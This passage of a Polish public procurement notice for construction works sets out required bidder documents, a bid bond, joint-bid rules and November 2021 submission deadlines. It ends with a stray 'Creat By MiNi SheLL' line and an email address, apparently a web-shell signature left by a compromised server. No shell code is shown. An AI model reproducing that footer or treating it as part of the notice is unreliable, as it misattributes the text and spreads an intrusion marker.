celu potwierdzenia braku podstaw<br/>wykluczenia obejmują: a) oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o<br/>braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007r. o<br/>ochronie konkurencji i konsumentów, z innym Wykonawcą, który złożył odrębną ofertę albo<br/>oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej<br/>grupy kapitałowej; b) zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że<br/>Wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp,<br/>wystawione nie wcześniej niż 3 m-ce przed jego złożeniem, a w przypadku zalegania z opłacaniem<br/>podatków lub opłat wraz z zaświadczeniem Zamawiający żąda złożenia dokumentów<br/>potwierdzających, że odpowiednio przed upływem terminu składania ofert Wykonawca dokonał<br/>płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące<br/>porozumienie w sprawie spłat tych należności; c) zaświadczenie albo inny dokument właściwej<br/>terenowej jednostki organizacyjnej ZUS lub właściwego oddziału regionalnego lub właściwej placówki<br/>terenowej KRUS potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia<br/>społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp, wystawione nie wcześniej niż 3 m-ce<br/>przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne<br/>lub zdrowotne wraz z zaświadczeniem albo innym dokumentem Zamawiający żąda złożenia<br/>dokumentów potwierdzających, że odpowiednio przed upływem terminu składania ofert Wykonawca<br/>dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz z odsetkami lub<br/>grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności; d) odpis lub informację z<br/>KRS lub z CEIDG, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 m-ce<br/>przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji; e) Jeżeli<br/>Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami RP, zamiast zaświadczenia<br/>właściwego naczelnika urzędu skarbowego, zaświadczenia albo innego dokumentu potwierdzającego,<br/>że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, lub<br/>odpisu albo informacji z KRS lub<br/>z CEIDG – składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę<br/>lub miejsce zamieszkania, potwierdzające odpowiednio, że: - nie naruszył obowiązków dotyczących<br/>płatności podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne, - nie otwarto jego<br/>likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z<br/>wierzycielami, jego działalność gospodarcza nie jest zawieszona<br/>ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w<br/>przepisach miejsca wszczęcia tej procedury, wystawione nie wcześniej niż 3 m-ce przed ich złożeniem.<br/>2. Jeżeli w kraju, w którym Wykon. ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów,<br/>o których mowa w pkt 1. e) lub gdy dokumenty te nie odnoszą się do wszystkich przypadków, o których<br/>mowa w art. 109 ust. 1 pkt 1 ustawy Pzp, zastępuje się je odpowiednio w całości lub w części dok.<br/>zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych<br/>do jego reprezentacji, lub oświad. osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub,<br/>jeżeli w kraju, w którym Wykon. ma siedzibę lub miejsce zamieszk. nie ma przepisów o oświadczeniu<br/>pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem,<br/>organem samorządu zawodow. lub gospodarczego, właściwym ze względu na siedzibę lub miejsce<br/>zamieszk. Wykon. – wystawione nie wcześniej niż 3 m-ce przed ich złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Podmiotowe środki dowodowe wymagane od Wykonawcy w celu<br/>potwierdzenia spełniania warunków udziału w postępowaniu dotyczących zdolności technicznej lub<br/>zawodowej obejmują: a) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat licząc wstecz od dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, daty i miejsca<br/>wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów<br/>określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których<br/>mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty<br/>budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie<br/>uzyskać tych dokumentów – inne odpowiednie dokumenty. Jeżeli Wykonawca powołuje się na<br/>doświadczenie w realizacji robót budowlanych, wykonywanych wspólnie z innymi Wykonawcami wykaz<br/>robót budowlanych dotyczy tych robót, w których wykonaniu Wykonawca ten bezpośrednio<br/>uczestniczył; b) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat<br/>ich kwalifikacji zawodowych, uprawnień i doświadczenia, niezbędnych do wykonania zamówienia<br/>publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do<br/>dysponowania tymi osobami. 2. Jeżeli jest to niezbędne do zapewnienia odpowiedniego przebiegu<br/>postępowania o udzielenie zamówienia, Zamawiający może na każdym etapie postępowania, wezwać<br/>Wykonawców do złożenia wszystkich lub niektórych podmiotowych środków dowodowych, aktualnych<br/>na dzień ich złożenia. 3. Jeżeli zachodzą uzasadnione podstawy do uznania, że złożone uprzednio<br/>podmiotowe środki dowodowe nie są już aktualne, Zamawiający może w każdym czasie wezwać<br/>Wykonawcę lub Wykonawców do złożenia wszystkich lub niektórych podmiotowych środków<br/>dowodowych, aktualnych na dzień ich złożenia. 4. Zamawiający nie wzywa do złożenia podmiotowych<br/>środków dowodowych, jeżeli może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych,<br/>w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005r. o informatyzacji<br/>działalności podmiotów realizujących zadania publiczne, o ile Wykonawca wskazał w oświadczeniu, o<br/>którym mowa w art. 125 ust. 1 ustawy Pzp dane umożliwiające dostęp do tych środków. W przypadku<br/>wskazania przez Wykonawcę dostępności pod określonymi adresami internetowymi ogólnodostępnych<br/>i bezpłatnych baz danych, podmiotowych środków dowodowych lub dokumentów potwierdzających<br/>umocowanie do reprezentowania podmiotu, Zamawiający może żądać od Wykonawcy przedstawienia<br/>tłumaczenia na język polski pobranych samodzielnie przez Zamawiającego podmiotowych środków<br/>dowodowych lub dokumentów. 5. Wykonawca nie jest zobowiązany do złożenia podmiotowych<br/>środków dowodowych, które Zamawiający posiada, jeżeli Wykonawca wskaże te środki oraz potwierdzi<br/>ich prawidłowość i aktualność.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Wykonawca, który powołuje się na rozwiązania równoważne, jest zobowiązany wykazać, że<br/>oferowane przez niego rozwiązanie spełnia wymagania określone przez Zamawiającego. W<br/>takim przypadku, Wykonawca załącza do oferty wykaz rozwiązań równoważnych wraz z jego<br/>opisem lub normami. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Zamawiający zastrzega sobie możliwość wezwania do wyjaśnienia bądź uzupełnienia<br/>wykazanych przez Wykonawcę rozwiązań równoważnych w wyznaczonym przez siebie<br/>terminie. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykaz oświadczeń i dokumentów, które Wykonawca składa wraz z ofertą: 1) Formularz<br/>ofertowy; 2) Kosztorys ofertowy; 3) Oświadczenie własne Wykonawcy, o którym mowa w art.125<br/>ust. 1 ustawy Pzp; 4) Oświadczenie dla każdego z Wykonawców występujących wspólnie, o<br/>którym mowa w art. 125 ust. 1 ustawy Pzp, o ile Wykonawcy wspólnie ubiegają się o udzielenie<br/>zamówienia; 5) Oświadczenie dla każdego z podmiotów udostępniających Wykonawcy zasoby, o<br/>którym mowa w art. 125 ust. 1 ustawy Pzp, o ile Wykonawca polega na zasobach innych<br/>podmiotów; 6) Oświadczenie Wykonawcy wspólnie ubiegającego się o udzielenie zamówienia<br/>składane na podstawie art. 117 ust. 4 ustawy Pzp (jeżeli dotyczy); 7) Zobowiązanie innego<br/>podmiotu udostępniającego zasoby (jeżeli dotyczy); 8) Dowód wniesienia wadium; 9)<br/>Pełnomocnictwo do podpisania oferty (o ile oferta zostanie złożona przez pełnomocnika); 10) Pełnomocnictwo dla pełnomocnika ustanowionego przez Wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia (o ile dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wymagane wadium w wysokości 10.000,00 zł (słownie: dziesięć tysięcy złotych). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Pełnomocnictwo winno być załączone do oferty. 2. W przypadku Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu na<br/>podstawie art. 108 ust. 1 oraz art. 109 ust. 1 pkt 1, 4, 5, 7 ustawy Pzp, natomiast warunki udziału<br/>w postępowaniu Wykonawcy spełniają wspólnie. 3. W przypadku wspólnego ubiegania się o<br/>zamówienie przez Wykonawców, oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp,<br/>składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu. 4. W odniesieniu do warunków<br/>dotyczących kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają<br/>roboty budowlane, do realizacji których te zdolności są wymagane. W tym przypadku<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do oferty<br/>oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy. 5.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, są oni zobowiązani<br/>na wezwanie Zamawiającego złożyć aktualne na dzień złożenia podmiotowe środki dowodowe,<br/>o których mowa w Sekcji V pkt 5.6.), przy czym podmiotowe środki dowodowe, o których mowa<br/>w Sekcji V pkt 5.7.) składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/ą<br/>spełnianie warunku, o którym mowa w Sekcji V pkt 5.4.). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia zostały określone w<br/>projektowanych postanowieniach umowy stanowiących załącznik nr 3 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-25 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionego na miniPortalu (https://miniportal.uzp.gov.pl).</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-25 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-24</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Opatrzenie właściwym podpisem oferty wraz z załącznikami następuje przed czynnością jej<br/>zaszyfrowania. Złożenie podpisu na formularzu przeznaczonym do złożenia, zmiany, wycofania<br/>oferty, udostępnionym przez miniPortal/ePUAP, nie jest równoznaczne ze złożeniem podpisu<br/>pod ofertą. Oferta bowiem, a nie formularz elektroniczny za pośrednictwem którego jest<br/>przekazywana, musi zostać opatrzona właściwym podpisem. 2. Sposób komunikowania się<br/>Zamawiającego z Wykonawcami (nie dotyczy składania i wycofania ofert): 1) W postępowaniu o<br/>udzielenie niniejszego zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami, w<br/>szczególności składanie oświadczeń, wniosków (z wyłączeniem oferty wraz z załącznikami,<br/>którą składa się pod rygorem nieważności w postaci elektronicznej opatrzonej kwalifikowanym<br/>podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym), zawiadomień oraz<br/>przekazywanie informacji odbywa się elektronicznie za pośrednictwem poczty elektronicznej<br/>(zamowienia@mzdik.pl). 2) Komunikacja pomiędzy Zamawiającym a Wykonawcami może<br/>odbywać się również za pomocą dedykowanego formularza dostępnego na ePUAP oraz<br/>udostępnionego przez miniPortal (Formularza do komunikacji). 3) Dokumenty elektroniczne<br/>składane są przez Wykonawcę za pośrednictwem poczty elektronicznej na adres email<br/>(zamowienia@mzdik.pl). Zamawiający dopuszcza również możliwość składania dokumentów<br/>elektronicznych za pośrednictwem Formularza do komunikacji jako załączniki. Sposób<br/>sporządzenia dokumentów elektronicznych musi być zgodny z wymaganiami określonymi w<br/>rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu<br/>sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów<br/>elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie oraz rozporządzeniu Ministra Rozwoju, Pracy i<br/>Technologii z dnia 23 grudnia 2020r. w sprawie podmiotowych środków dowodowych oraz<br/>innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od Wykonawcy. W<br/>korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się<br/>numerem postępowania wskazanym w SWZ. 3. Wykonawca przed zawarciem umowy<br/>zobowiązany jest do wniesienia zabezpieczenia należytego wykonania umowy na sumę<br/>stanowiącą 5% ceny całkowitej podanej w ofercie.

Creat By MiNi SheLL
Email: jattceo@gmail.com